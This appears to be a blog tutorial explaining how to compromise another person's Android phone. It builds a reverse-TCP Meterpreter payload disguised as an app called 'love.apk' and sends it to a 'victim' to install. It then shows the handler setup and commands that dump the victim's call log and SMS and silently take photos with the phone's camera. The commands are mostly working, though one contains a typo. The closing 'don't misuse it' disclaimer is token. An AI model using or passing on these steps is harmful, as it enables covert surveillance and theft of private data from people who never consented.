HOW TO ACCESS ANYONE's MOBILE USING MSFVENOM



  FOR THIS THE BASIC REQUIREMENT IS


KALI LINUX

A GOOD INTERNET

LOT OF PATIENCE




So, here we are going to create a payload using kali terminal and we send that payload to the victim’s mobile phone. After the installation of that app on the victim’s mobile, the app sends us all the data of the victim’s mobile phone. This is the main trick to hack any android phone. 


Open your terminal and type


    ifconfig


and then it will show the IP address of your device.


then type , 


msfvenom -p android/meterpreter/reverse_tcp lhost=’IP address’ lhost=4444 > /root/Desktop/love.apk


HIT ENTER


It will create a payload which steals credential from the victim’s mobile phone. This will help us to hack a mobile phone.


Here, we use msfvenom which is used to create a malicious app then I used -p which means we generate a payload then I give a command to generate a payload for Android and then I simply give the IP and port no. too and then I give the location where I wanted to save that apk.


Simply, send this love.apk file to victim’s mobile and install it. Open your terminal and type


    msfconsole



configure some settings before exploit.


    use exploit/multi/handler

    set payload android/meterpreter/reverse_tcp

    

   set lhost 192.168.0.103


   

    set lport 4444

   

    exploit




Type


    sysinfo (It will show information about the device.)

 

Type


dump_calllog (It will dump the call log)


similarly type, 


dump_sms (it will dump sms )



My favourite - 


type 


    webcam_snap 1


(It will take a snap silently by the second camera.)


So that was the tutorial headlined 


Please don't misuse it


PAYLOAD CREDITS GOES TO ITS DEVELOPER


Its a tutorial how you can manage to access anyone's device using the payload


Hope you gain knowledge about that


Contact - https://t.me/nexus_here


SHARE AND SUPPORT US

Comments

Popular Posts